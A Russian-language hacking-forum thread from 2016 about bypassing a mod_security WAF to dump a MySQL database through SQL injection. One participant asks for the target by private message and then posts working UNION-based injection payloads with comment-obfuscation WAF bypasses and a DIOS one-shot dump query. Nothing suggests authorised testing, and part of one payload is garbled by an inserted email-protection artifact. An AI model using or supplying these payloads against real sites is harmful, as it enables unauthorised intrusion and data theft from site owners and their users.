Sqlmap + waf

Discussion in 'Песочница' started by OSW, 4 May 2016.

  1. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    Есть boolean-based blind, есть waf (mod_security), вытащил дб/юзера/хост ч-з sqlmap с набором стандартных тамперов. Но при попытках вытащить таблицы и проч., натыкаюсь на waf'ную 406 ошибку.

    Вижу вектор движения: information -> inform%0bation (так отрабатывает), но уперся в автоматизацию этого действия. Есть какие-то решения?
     
  2. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    DIOS - DUMP IN ONE SHOT. Технология SQL Injection с помощью которой можно вывести все таблицы столбцы а далее в тот же скуль мап ты уже можешь указать имя конкретной таблицы. Это как один из вариантов.
     
    _________________________
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    особенно актуально с blind
     
    _________________________
  4. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    OUT OF BAND - как вариант.
     
    _________________________
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,066
    Likes Received:
    1,565
    Reputations:
    40
    Как подъёб звучал
     
  6. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Подъёб засчитан.
     
    _________________________
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    oob есть не для всех бд, тут скорее речь о mysql
     
    _________________________
  8. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Полностью согласен. Но вдруг....
     
    _________________________
    #8 SooLFaa, 4 May 2016
    Last edited: 4 May 2016
  9. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    Благодарю, но не сработало.
     
  10. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Я так понимаю, что СУБД MySQL?
     
    _________________________
  11. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    Да, забыл указать сразу.
     
  12. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Скинь в лс таргет, после работы попробуем покрутить.
     
    _________________________
  13. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.
    Валидный запрос в твоем случае выглядет так:
    ../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/
    DIOS.
    ..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)[email protected]:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/

    И всё проще без sqlmap. Валидную ссылку отправил в лс.
     
    _________________________
    #13 SooLFaa, 5 May 2016
    Last edited: 5 May 2016
    HeReTiC and OSW like this.
  14. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    Мегареспектище!
    Курю, где был не прав.
     
Loading...